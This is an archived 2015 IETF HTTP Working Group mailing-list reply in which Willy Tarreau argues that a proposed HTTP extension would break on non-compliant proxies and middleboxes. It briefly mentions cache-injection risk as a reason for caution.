- From: Willy Tarreau <w@1wt.eu>
- Date: Wed, 29 Apr 2015 18:21:18 +0200
- To: "henry.story@bblfish.net" <henry.story@bblfish.net>
- Cc: Michael Sweet <msweet@apple.com>, Eric Covener <covener@gmail.com>, HTTP Working Group <ietf-http-wg@w3.org>
On Wed, Apr 29, 2015 at 06:08:16PM +0200, henry.story@bblfish.net wrote: > > Yes and local anti-virus agents deployed on the PC, accessing the traffic > > in the browser before it's encrypted and which are well-known for not > > following standards and causing false bug reports. > > yes of course. Research is needed here, as I pointed out previously. Research *was done* already which led to the warning in the RFC. It also led to people considering that they don't want to waste their time implementing HTTP/2 in clear not sending websocket on port 80 because some broken intermediaries are there. Sure these ones will fade away, and the upgrade protocols involved there are designed to support a graceful fallback in case of failure. Despite this there's some breakage in field. What you're trying to do relies on something deeply burried in the roots of HTTP which faces even more potential for breakage and security issues (eg: send a second request in the body and cross fingers for caches not to take it and inject the first response's contents for the second request). > The situation may not be as bad as feared ( My Apache server worked fine > for example ). Sure, your Apache server worked fine. It's easy to spot standards compliant products which have no problem parsing a message complying with standards. It's much harder to spot the bad ones because in general they're much less visible (which is why we call them interception proxies). Sometimes it will be your load balancer, sometimes your firewall, sometimes a compression module in your server, sometimes a URL filter. Just two weeks ago I had a customer complain that haproxy was preventing his POST payload from reaching the server and causing timeouts. The network trace revealed that it indeed never left the client... He was running a broken "bandwidth limitation" product on the PC (that's a nice way to save bandwidth). That's just an example of all the crap you can find in field which will take years to get detected and even more to get fixed. And even those which used to be standard-compliant for some time would now be broken by your extension, leading to even more confusion. > This research will then help work out what the deployment > strategy has to be. > > Is this hypothetical problem the only one? What is hypothetical is not the problem but your belief that you can inventory all cases of trouble in a finite time by doing some research. > Perhaps we can put this aside > for the time being and see if there are other issues that are problematic. Well you can use it between your own components, but you'll have a hard time explaining to all your users that their freshly acquired products which used to respect standard still 2015 are not standard-compliant anymore past 2015. At least with Upgrade we had the ability to play on the compliance side to convince vendors to fix their crap and sell their fixes as feature updates ("support for websocket and HTTP/2"). Willy
Received on Wednesday, 29 April 2015 16:21:46 UTC